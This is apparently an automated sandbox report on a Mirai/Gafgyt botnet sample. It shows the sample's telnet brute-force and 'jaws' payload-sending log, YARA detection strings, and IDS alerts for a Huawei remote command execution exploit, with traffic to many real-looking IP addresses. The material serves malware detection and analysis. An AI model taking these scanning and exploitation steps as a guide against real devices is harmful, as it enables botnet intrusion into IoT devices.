[TelnetScanner] FD102 lost connection
[TelnetScanner] FD102 retrying with different auth combo!
[TelnetScanner] FD97 connected. Trying :
[TelnetScanner] FD102 connected. Trying :
[TelnetScanner] FD18 connected. Trying :,CDG
[TelnetScanner] FD76 connection gracefully closed
[TelnetScanner] FD76 lost connection
[TelnetScanner] FD76 retrying with different auth combo!
[TelnetScanner] FD76 connected. Trying :DFGC
[TelnetScanner] FD27 connection gracefully closed
[TelnetScanner] FD27 lost connection
[TelnetScanner] FD27 retrying with different auth combo!
[TelnetScanner] FD27 connected. Trying :,CDG
[TelnetScanner] FD22 connection gracefully closed
[TelnetScanner] FD22 lost connection
[TelnetScanner] FD22 retrying with different auth combo!
[TelnetScanner] FD23 connection gracefully closed
[TelnetScanner] FD23 lost connection
[TelnetScanner] FD23 retrying with different auth combo!
[TelnetScanner] FD22 connected. Trying :9%1N
[TelnetScanner] FD23 connected. Trying :DFGE
[TelnetScanner] FD21 connection gracefully closed
[TelnetScanner] FD21 lost connection
[TelnetScanner] FD21 retrying with different auth combo!
[TelnetScanner] FD21 connected. Trying :1;NGND
[TelnetScanner] FD26 connection gracefully closed
[TelnetScanner] FD26 lost connection
[TelnetScanner] FD26 retrying with different auth combo!
[TelnetScanner] FD26 connected. Trying :
[TelnetScanner] FD28 connection gracefully closed
[TelnetScanner] FD28 lost connection
[TelnetScanner] FD28 retrying with different auth combo!
[TelnetScanner] FD72 connection gracefully closed
[TelnetScanner] FD72 lost connection
[TelnetScanner] FD72 retrying with different auth combo!
[TelnetScanner] FD107 connection gracefully closed
[TelnetScanner] FD107 lost connection
[TelnetScanner] FD107 retrying with different auth combo!
[TelnetScanner] FD28 connected. Trying :9%1N
[TelnetScanner] FD72 connected. Trying :
[TelnetScanner] FD107 connected. Trying :
[TelnetScanner] FD24 connection gracefully closed
[TelnetScanner] FD24 lost connection
[TelnetScanner] FD24 retrying with different auth combo!
[TelnetScanner] FD24 connected. Trying :
[TelnetScanner] FD94 connection gracefully closed
[TelnetScanner] FD94 lost connection
[TelnetScanner] FD94 retrying with different auth combo!
[TelnetScanner] FD94 connected. Trying :, %?&
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD98 connected. Trying :DFGB
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :DFGB
[TelnetScanner] FD124 connection gracefully closed
[TelnetScanner] FD124 lost connection
[TelnetScanner] FD124 retrying with different auth combo!
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD126 connection gracefully closed
[TelnetScanner] FD126 lost connection
[TelnetScanner] FD126 retrying with different auth combo!
[TelnetScanner] FD114 connection gracefully closed
[TelnetScanner] FD114 lost connection
[TelnetScanner] FD114 retrying with different auth combo!
[TelnetScanner] FD124 connected. Trying :5
[TelnetScanner] FD16 connected. Trying :5
[TelnetScanner] FD126 connected. Trying :
[TelnetScanner] FD114 connected. Trying :DFG@
[TelnetScanner] FD35 connection gracefully closed
[TelnetScanner] FD35 lost connection
[TelnetScanner] FD35 retrying with different auth combo!
[TelnetScanner] FD35 connected. Trying :GDE
[TelnetScanner] FD81 connection gracefully closed
[TelnetScanner] FD81 lost connection
[TelnetScanner] FD81 retrying with different auth combo!
[TelnetScanner] FD99 connection gracefully closed
[TelnetScanner] FD99 lost connection
[TelnetScanner] FD99 retrying with different auth combo!
[TelnetScanner] FD99 connected. Trying :DFG@
[TelnetScanner] FD53 connection gracefully closed
[TelnetScanner] FD53 lost connection
[TelnetScanner] FD53 retrying with different auth combo!
[TelnetScanner] FD53 connected. Trying :
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD98 connected. Trying :
[TelnetScanner] FD70 connection gracefully closed
[TelnetScanner] FD70 lost connection
[TelnetScanner] FD70 retrying with different auth combo!
[TelnetScanner] FD70 connected. Trying :DFGE
[TelnetScanner] FD65 connection gracefully closed
[TelnetScanner] FD65 lost connection
[TelnetScanner] FD65 retrying with different auth combo!
[TelnetScanner] FD75 connection gracefully closed
[TelnetScanner] FD75 lost connection
[TelnetScanner] FD75 retrying with different auth combo!
[TelnetScanner] FD65 connected. Trying :A;F
[TelnetScanner] FD75 connected. Trying :<@
[TelnetScanner] FD67 connection gracefully closed
[TelnetScanner] FD67 lost connection
[TelnetScanner] FD67 retrying with different auth combo!
[TelnetScanner] FD[jaws] FD33 connected to 122.61.248.88
[jaws] FD34 connected to 122.23.164.7
[jaws] FD40 connected to 122.182.227.59
[jaws] FD41 connected to 122.223.88.86
[jaws] FD42 connected to 122.111.97.68
[jaws] FD43 finished
[jaws] FD44 connected to 122.242.170.172
[jaws] FD46 connected to 122.156.77.29
[jaws] FD48 connected to 84.224.232.177
[jaws] FD7 sending payload
[jaws] FD9 connected to 122.67.183.57
[jaws] FD10 sending payload
[jaws] FD12 sending payload
[jaws] FD14 connected to 122.20.35.136
[jaws] FD15 sending payload
[jaws] FD16 connected to 122.153.234.148
[jaws] FD17 sending payload
[jaws] FD18 sending payload
[jaws] FD19 connected to 122.191.199.210
[jaws] FD20 sending payload
[jaws] FD21 sending payload
[jaws] FD22 sending payload
[jaws] FD23 connected to 122.233.246.43
[jaws] FD24 connected to 122.33.116.134
[jaws] FD25 connected to 122.194.213.133
[jaws] FD26 connected to 122.249.254.66
[jaws] FD27 sending payload
[jaws] FD29 sending payload
[jaws] FD30 sending payload
[jaws] FD31 connected to 122.180.138.180
[jaws] FD33 sending payload
[jaws] FD34 sending payload
[jaws] FD36 connected to 122.136.255.50
[jaws] FD37 connected to 122.141.17.179
[jaws] FD38 connected to 122.67.216.182
[jaws] FD40 sending payload
[jaws] FD41 sending payload
[jaws] FD42 sending payload
[jaws] FD44 sending payload
[jaws] FD46 sending payload
[jaws] FD48 sending payload
[jaws] FD9 sending payload
[jaws] FD12 finished
[jaws] FD14 sending payload
[jaws] FD16 sending payload
[jaws] FD19 sending payload
[jaws] FD23 sending payload
[jaws] FD24 sending payload
[jaws] FD25 sending payload
[jaws] FD26 sending payload
[jaws] FD31 sending payload
[jaws] FD36 sending payload
[jaws] FD37 sending payload
[jaws] FD38 sending payload
[jaws] FD24 finished
[jaws] FD6 connected to 122.55.34.202
[jaws] FD6 sending payload
[jaws] FD26 finished
[jaws] FD37 finished
[jaws] FD70 connected to 122.95.231.214
[jaws] FD84 connected to 122.183.29.152
[jaws] FD70 sending payload
[jaws] FD84 sending payload
[jaws] FD6 finished
[jaws] FD8 connected to 122.255.55.72
[jaws] FD11 connected to 122.224.212.158
[jaws] FD28 connected to 122.204.80.193
[jaws] FD35 connected to 122.78.115.23
[jaws] FD39 connected to 122.69.111.158
[jaws] FD45 connected to 122.222.13.208
[jaws] FD47 connected to 122.80.82.115
[jaws] FD8 sending payload
[jaws] FD11 sending payload
[jaws] FD28 sending payload
[jaws] FD35 sending payload
[jaws] FD39 sending payload
[jaws] FD45 sending payload
[jaws] FD47 sending payload
[jaws] FD5 finished
[jaws] FD108 connected to 85.36.248.83
[jaws] FD108 sending payload
[jaws] FD75 connected to 122.192.128.253
[jaws] FD91 connected to 122.79.187.89
[jaws] FD75 sending payload
[jaws] FD91 sending payload
[jaws] FD91 finished
[jaws] FD94 connected to 122.68.164.85
[jaws] FD94 sending payload
[jaws] FD39 finished
[jaws] FD98 connected to 85.253.8.6
[jaws] FD99 connected to 85.136.223.156
[jaws] FD45 connected to 85.78.103.165
[jaws] FD7 finished
[jaws] FD6 finished
[jaws] FD13 connected to 85.106.21.221
[jaws] FD47 connected to 85.235.65.213
[jaws] FD8 finished
[jaws] FD32 connected to 85.113.108.138
[jaws] FD11 finished
[jaws] FD84 connected to 85.139.150.136
[jaws] FD28 finished
[jaws] FD43 connected to 85.196.66.190
[jaws] FD35 finished
[jaws] FD49 connected to 85.79.33.54
[jaws] FD50 connected to 85.56.54.124
[jaws] FD51 connected to 85.68.53.210
[jaws] FD52 connected to 85.18.231.9
[jaws] FD53 connected to 85.16.74.154
[jaws] FD54 connected to 85.190.153.128
[jaws] FD55 connected to 85.199.91.21
[jaws] FD56 connected to 85.89.54.233
[jaws] FD57 connected to 85.119.222.110
[jaws] FD58 connected to 85.82.218.23
[jaws] FD59 connected to 85.8.168.105
[jaws] FD60 connected to 85.70.120.126
[jaws] FD61 connected to 85.61.193.169
[jaws] FD62 connected to 85.28.101.92
[jaws] FD63 connected to 85.16.8.102
[jaws] FD64 connected to 85.118.49.115
[jaws] FD65 connected to 85.179.156.195
[jaws] FD97 connected to 85.68.3.250
[jaws] FD98 sending payload
[jaws] FD99 sending payload
[jaws] FD45 sending payload
[jaws] FD13 sending payload
[jaws] FD47 sending payload
[jaws] FD32 sending payload
59 connection gracefully closed
[TelnetScanner] FD59 lost connection
[TelnetScanner] FD59 retrying with different auth combo!
[TelnetScanner] FD67 connected. Trying :1;NGND
[TelnetScanner] FD59 connected. Trying ECFF:
[TelnetScanner] FD90 connection gracefully closed
[TelnetScanner] FD90 lost connection
[TelnetScanner] FD90 retrying with different auth combo!
[TelnetScanner] FD90 connected. Trying :
[TelnetScanner] FD92 connection gracefully closed
[TelnetScanner] FD92 lost connection
[TelnetScanner] FD92 retrying with different auth combo!
[TelnetScanner] FD92 connected. Trying :
[TelnetScanner] FD12 connection gracefully closed
[TelnetScanner] FD12 lost connection
[TelnetScanner] FD12 retrying with different auth combo!
[TelnetScanner] FD17 connection gracefully closed
[TelnetScanner] FD17 lost connection
[TelnetScanner] FD17 retrying with different auth combo!
[TelnetScanner] FD14 connection gracefully closed
[TelnetScanner] FD14 lost connection
[TelnetScanner] FD14 retrying with different auth combo!
[TelnetScanner] FD15 connection gracefully closed
[TelnetScanner] FD15 lost connection
[TelnetScanner] FD15 retrying with different auth combo!
[TelnetScanner] FD12 connected. Trying :DFGC
[TelnetScanner] FD17 connected. Trying :DFGC
[TelnetScanner] FD14 connected. Trying :
[TelnetScanner] FD15 connected. Trying :DFGE
[TelnetScanner] FD13 connection gracefully closed
[TelnetScanner] FD13 lost connection
[TelnetScanner] FD13 retrying with different auth combo!
[TelnetScanner] FD13 connected. Trying :,CDG
[TelnetScanner] FD36 connection gracefully closed
[TelnetScanner] FD36 lost connection
[TelnetScanner] FD36 retrying with different auth combo!
[TelnetScanner] FD36 connected. Trying :
[TelnetScanner] FD32 connected. Trying :DFGE
[TelnetScanner] FD38 connected. Trying :DFG@
[TelnetScanner] FD45 connected. Trying :GDE
[TelnetScanner] FD62 connected. Trying :
[TelnetScanner] FD19 connection gracefully closed
[TelnetScanner] FD19 lost connection
[TelnetScanner] FD19 retrying with different auth combo!
[TelnetScanner] FD19 connected. Trying :ECGG
[TelnetScanner] FD74 connection gracefully closed
[TelnetScanner] FD74 lost connection
[TelnetScanner] FD74 retrying with different auth combo!
[TelnetScanner] FD74 connected. Trying :GFDO
[TelnetScanner] FD81 connected. Trying :DFGC
[TelnetScanner] FD39 connection gracefully closed
[TelnetScanner] FD39 lost connection
[TelnetScanner] FD39 retrying with different auth combo!
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD39 connected. Trying :A;F
[TelnetScanner] FD98 connected. Trying :DFGC
[TelnetScanner] FD42 connection gracefully closed
[TelnetScanner] FD42 lost connection
[TelnetScanner] FD42 retrying with different auth combo!
[TelnetScanner] FD46 connection gracefully closed
[TelnetScanner] FD46 lost connection
[TelnetScanner] FD46 retrying with different auth combo!
[TelnetScanner] FD42 connected. Trying :
[TelnetScanner] FD50 connection gracefully closed
[TelnetScanner] FD50 lost connection
[TelnetScanner] FD50 retrying with different auth combo!
[TelnetScanner] FD50 connected. Trying :GDEBC@
[TelnetScanner] FD63 connection gracefully closed
[TelnetScanner] FD63 lost connection
[TelnetScanner] FD63 retrying with different auth combo!
[TelnetScanner] FD71 connection gracefully closed
[TelnetScanner] FD71 lost connection
[TelnetScanner] FD71 retrying with different auth combo!
[TelnetScanner] FD71 connected. Trying :
[TelnetScanner] FD89 connection gracefully closed
[TelnetScanner] FD89 lost connection
[TelnetScanner] FD89 retrying with different auth combo!
[TelnetScanner] FD89 connected. Trying :
[TelnetScanner] FD106 connection gracefully closed
[TelnetScanner] FD106 lost connection
[TelnetScanner] FD106 retrying with different auth combo!
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
debug.dbg.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    debug.dbg.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
    • 0x12c00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12ca0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12cb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12cc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12cdc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12cf0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12d04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12d18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12d2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12d40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12d54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12d68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12d7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12d90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    debug.dbg.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
    • 0xf7c8:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
    debug.dbg.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
    • 0xfe8f:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
    debug.dbg.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
    • 0xd4ee:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    • 0xd5fc:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    Click to see the 9 entries
    SourceRuleDescriptionAuthorStrings
    5431.1.0000000000400000.0000000000418000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      5431.1.0000000000400000.0000000000418000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x12c00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12ca0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12cb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12cc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12cdc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12cf0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12d04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12d18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12d2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12d40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12d54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12d68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12d7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12d90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      5431.1.0000000000400000.0000000000418000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0xf7c8:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      5431.1.0000000000400000.0000000000418000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0xfe8f:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      5431.1.0000000000400000.0000000000418000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
      • 0xd4ee:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      • 0xd5fc:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      Click to see the 27 entries
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T11:57:59.969455+010020290291Web Application Attack192.168.2.135925045.38.44.17547TCP
      2024-11-07T11:58:00.233412+010020290291Web Application Attack192.168.2.135152695.178.151.1097547TCP
      2024-11-07T11:58:03.396852+010020290291Web Application Attack192.168.2.134021461.64.58.1617547TCP
      2024-11-07T11:58:04.381224+010020290291Web Application Attack192.168.2.134070461.64.58.1617547TCP
      2024-11-07T11:58:05.469807+010020290291Web Application Attack192.168.2.135431074.194.189.2037547TCP
      2024-11-07T11:58:06.404216+010020290291Web Application Attack192.168.2.134923646.13.119.107547TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T11:58:06.389000+010028352221A Network Trojan was detected192.168.2.1356436197.66.118.14437215TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: debug.dbg.elfAvira: detected
      Source: debug.dbg.elfReversingLabs: Detection: 57%
      Source: debug.dbg.elfJoe Sandbox ML: detected

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2029029 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.13:59250 -> 45.38.44.1:7547
      Source: Network trafficSuricata IDS: 2029029 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.13:51526 -> 95.178.151.109:7547
      Source: Network trafficSuricata IDS: 2029029 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.13:40214 -> 61.64.58.161:7547
      Source: Network trafficSuricata IDS: 2029029 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.13:40704 -> 61.64.58.161:7547
      Source: Network trafficSuricata IDS: 2029029 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.13:54310 -> 74.194.189.203:7547
      Source: Network trafficSuricata IDS: 2029029 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.13:49236 -> 46.13.119.10:7547
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.13:56436 -> 197.66.118.144:37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 55804 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37300 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36156 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59250 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 53228 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37966 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 51526 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 52030 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 45154 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36226 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 59716 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 43894 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36840 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 44832 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38300 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 43062 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 51322 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35964 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40964 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37008 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38686 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35692 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 36232 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 41210 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 35950 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 52414 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54220 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54440 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 55320 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 58820 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 58918 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 44078 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 44884 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37274 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38948 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 52622 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 55466 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 37784 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 39344 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40214 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40410 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 51916 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 52350 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 42262 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 50976 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56010 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56106 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54834 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50636 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33400 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52628 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40760 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 46328 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39882 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40704 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 40414 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38306 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 51364 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54306 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 38316 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 54310 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 56436 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57694 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33176 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37268 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48036 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40440 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54720 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47782 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51398 -> 37215
